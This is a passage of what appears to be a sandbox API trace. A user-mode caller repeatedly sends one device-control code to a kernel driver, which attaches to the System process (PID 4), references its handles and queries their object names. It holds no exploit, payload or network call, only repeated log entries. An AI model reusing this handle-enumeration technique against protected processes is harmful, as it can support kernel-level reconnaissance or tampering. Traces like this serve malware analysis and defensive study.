lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.366] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.366] PsAcquireProcessExitSynchronization () returned 0x0 [0289.366] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.366] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069104a50, HandleInformation=0x0) returned 0x0 [0289.366] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.366] PsReleaseProcessExitSynchronization () returned 0x2 [0289.366] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f847 [0289.366] ObQueryNameString (in: Object=0xffffe00069104a50, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.366] ObfDereferenceObject (Object=0xffffe00069104a50) returned 0x7fff [0289.366] IoCompleteRequest () returned 0x0 [0289.366] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xbe, lpOverlapped=0x0) returned 1 [0289.366] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.366] PsAcquireProcessExitSynchronization () returned 0x0 [0289.366] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.366] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007bf75980, HandleInformation=0x0) returned 0x0 [0289.366] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.366] PsReleaseProcessExitSynchronization () returned 0x2 [0289.366] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f846 [0289.366] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.366] ObfDereferenceObject (Object=0xffffe0007bf75980) returned 0x7ffc [0289.366] IoCompleteRequest () returned 0x0 [0289.366] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.366] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.366] PsAcquireProcessExitSynchronization () returned 0x0 [0289.366] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.366] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691d7700, HandleInformation=0x0) returned 0x0 [0289.366] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.366] PsReleaseProcessExitSynchronization () returned 0x2 [0289.366] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f845 [0289.366] ObQueryNameString (in: Object=0xffffe000691d7700, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.366] ObfDereferenceObject (Object=0xffffe000691d7700) returned 0x7fff [0289.366] IoCompleteRequest () returned 0x0 [0289.367] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.367] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.367] PsAcquireProcessExitSynchronization () returned 0x0 [0289.367] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.367] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691cf700, HandleInformation=0x0) returned 0x0 [0289.367] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.367] PsReleaseProcessExitSynchronization () returned 0x2 [0289.367] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f844 [0289.367] ObQueryNameString (in: Object=0xffffe000691cf700, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.367] ObfDereferenceObject (Object=0xffffe000691cf700) returned 0x7fff [0289.367] IoCompleteRequest () returned 0x0 [0289.367] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0289.367] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.367] PsAcquireProcessExitSynchronization () returned 0x0 [0289.367] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.367] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a647dd0, HandleInformation=0x0) returned 0x0 [0289.367] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.367] PsReleaseProcessExitSynchronization () returned 0x2 [0289.367] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f843 [0289.367] ObQueryNameString (in: Object=0xffffe0006a647dd0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.367] ObfDereferenceObject (Object=0xffffe0006a647dd0) returned 0x7fff [0289.367] IoCompleteRequest () returned 0x0 [0289.367] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.367] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.367] PsAcquireProcessExitSynchronization () returned 0x0 [0289.367] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.367] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0a8860, HandleInformation=0x0) returned 0x0 [0289.367] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.367] PsReleaseProcessExitSynchronization () returned 0x2 [0289.367] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f842 [0289.367] ObQueryNameString (in: Object=0xffffe0006a0a8860, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.367] ObfDereferenceObject (Object=0xffffe0006a0a8860) returned 0x7ffe [0289.367] IoCompleteRequest () returned 0x0 [0289.367] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.367] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.367] PsAcquireProcessExitSynchronization () returned 0x0 [0289.367] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.367] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069373ae0, HandleInformation=0x0) returned 0x0 [0289.367] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.367] PsReleaseProcessExitSynchronization () returned 0x2 [0289.367] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f841 [0289.368] ObQueryNameString (in: Object=0xffffe00069373ae0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.368] ObfDereferenceObject (Object=0xffffe00069373ae0) returned 0x7fff [0289.368] IoCompleteRequest () returned 0x0 [0289.368] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.368] PsAcquireProcessExitSynchronization () returned 0x0 [0289.368] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.368] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a65950, HandleInformation=0x0) returned 0x0 [0289.368] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.368] PsReleaseProcessExitSynchronization () returned 0x2 [0289.368] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f840 [0289.368] ObQueryNameString (in: Object=0xffffe00068a65950, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.368] ObfDereferenceObject (Object=0xffffe00068a65950) returned 0x7fff [0289.368] IoCompleteRequest () returned 0x0 [0289.368] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.368] PsAcquireProcessExitSynchronization () returned 0x0 [0289.368] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.368] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691f0850, HandleInformation=0x0) returned 0x0 [0289.368] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.368] PsReleaseProcessExitSynchronization () returned 0x2 [0289.368] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83f [0289.368] ObQueryNameString (in: Object=0xffffe000691f0850, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.368] ObfDereferenceObject (Object=0xffffe000691f0850) returned 0x7fff [0289.368] IoCompleteRequest () returned 0x0 [0289.368] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.368] PsAcquireProcessExitSynchronization () returned 0x0 [0289.368] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.368] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a049460, HandleInformation=0x0) returned 0x0 [0289.368] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.368] PsReleaseProcessExitSynchronization () returned 0x2 [0289.368] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83e [0289.368] ObQueryNameString (in: Object=0xffffe0006a049460, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.368] ObfDereferenceObject (Object=0xffffe0006a049460) returned 0x7fff [0289.368] IoCompleteRequest () returned 0x0 [0289.368] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.368] PsAcquireProcessExitSynchronization () returned 0x0 [0289.369] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000dec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2c1f20, HandleInformation=0x0) returned 0x0 [0289.369] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.369] PsReleaseProcessExitSynchronization () returned 0x2 [0289.369] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83d [0289.369] ObQueryNameString (in: Object=0xffffe0006a2c1f20, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.369] ObfDereferenceObject (Object=0xffffe0006a2c1f20) returned 0x7ffd [0289.369] IoCompleteRequest () returned 0x0 [0289.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.369] PsAcquireProcessExitSynchronization () returned 0x0 [0289.369] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000df0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa23e0, HandleInformation=0x0) returned 0x0 [0289.369] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.369] PsReleaseProcessExitSynchronization () returned 0x2 [0289.369] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83c [0289.369] ObQueryNameString (in: Object=0xffffe00069fa23e0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.369] ObfDereferenceObject (Object=0xffffe00069fa23e0) returned 0x7ffd [0289.369] IoCompleteRequest () returned 0x0 [0289.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.369] PsAcquireProcessExitSynchronization () returned 0x0 [0289.369] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000df4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2bf090, HandleInformation=0x0) returned 0x0 [0289.369] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.369] PsReleaseProcessExitSynchronization () returned 0x2 [0289.369] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83b [0289.369] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.369] ObfDereferenceObject (Object=0xffffe0006a2bf090) returned 0x7fd9 [0289.369] IoCompleteRequest () returned 0x0 [0289.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.369] PsAcquireProcessExitSynchronization () returned 0x0 [0289.369] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e04, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6b6070, HandleInformation=0x0) returned 0x0 [0289.369] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.369] PsReleaseProcessExitSynchronization () returned 0x2 [0289.369] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f83a [0289.369] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.369] ObfDereferenceObject (Object=0xffffe0006a6b6070) returned 0x7ffb [0289.369] IoCompleteRequest () returned 0x0 [0289.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.369] PsAcquireProcessExitSynchronization () returned 0x0 [0289.369] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e0c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa1f20, HandleInformation=0x0) returned 0x0 [0289.370] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.370] PsReleaseProcessExitSynchronization () returned 0x2 [0289.370] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f839 [0289.370] ObQueryNameString (in: Object=0xffffe00069fa1f20, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.370] ObfDereferenceObject (Object=0xffffe00069fa1f20) returned 0x7ffd [0289.370] IoCompleteRequest () returned 0x0 [0289.370] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.370] PsAcquireProcessExitSynchronization () returned 0x0 [0289.370] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.370] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa4890, HandleInformation=0x0) returned 0x0 [0289.370] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.370] PsReleaseProcessExitSynchronization () returned 0x2 [0289.370] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f838 [0289.370] ObQueryNameString (in: Object=0xffffe00069fa4890, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.370] ObfDereferenceObject (Object=0xffffe00069fa4890) returned 0x7ffa [0289.370] IoCompleteRequest () returned 0x0 [0289.370] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.370] PsAcquireProcessExitSynchronization () returned 0x0 [0289.370] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.370] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f934c0, HandleInformation=0x0) returned 0x0 [0289.370] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.370] PsReleaseProcessExitSynchronization () returned 0x2 [0289.370] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f837 [0289.370] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.370] ObfDereferenceObject (Object=0xffffe00069f934c0) returned 0x7fd8 [0289.370] IoCompleteRequest () returned 0x0 [0289.370] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.370] PsAcquireProcessExitSynchronization () returned 0x0 [0289.370] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.370] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a1217d0, HandleInformation=0x0) returned 0x0 [0289.370] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.370] PsReleaseProcessExitSynchronization () returned 0x2 [0289.370] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f836 [0289.370] ObQueryNameString (in: Object=0xffffe0006a1217d0, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.370] ObfDereferenceObject (Object=0xffffe0006a1217d0) returned 0x7ffd [0289.370] IoCompleteRequest () returned 0x0 [0289.370] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.370] PsAcquireProcessExitSynchronization () returned 0x0 [0289.370] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.370] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a280cd0, HandleInformation=0x0) returned 0x0 [0289.370] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.370] PsReleaseProcessExitSynchronization () returned 0x2 [0289.371] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f835 [0289.371] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.371] ObfDereferenceObject (Object=0xffffe0006a280cd0) returned 0x7fcd [0289.371] IoCompleteRequest () returned 0x0 [0289.371] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.371] PsAcquireProcessExitSynchronization () returned 0x0 [0289.371] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.373] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a136d40, HandleInformation=0x0) returned 0x0 [0289.373] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.373] PsReleaseProcessExitSynchronization () returned 0x2 [0289.373] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f834 [0289.373] ObQueryNameString (in: Object=0xffffe0006a136d40, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.373] ObfDereferenceObject (Object=0xffffe0006a136d40) returned 0x7ffa [0289.373] IoCompleteRequest () returned 0x0 [0289.373] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.373] PsAcquireProcessExitSynchronization () returned 0x0 [0289.373] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.373] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a403960, HandleInformation=0x0) returned 0x0 [0289.373] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.373] PsReleaseProcessExitSynchronization () returned 0x2 [0289.373] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f833 [0289.373] ObQueryNameString (in: Object=0xffffe0006a403960, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.373] ObfDereferenceObject (Object=0xffffe0006a403960) returned 0x7fff [0289.373] IoCompleteRequest () returned 0x0 [0289.373] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.373] PsAcquireProcessExitSynchronization () returned 0x0 [0289.373] 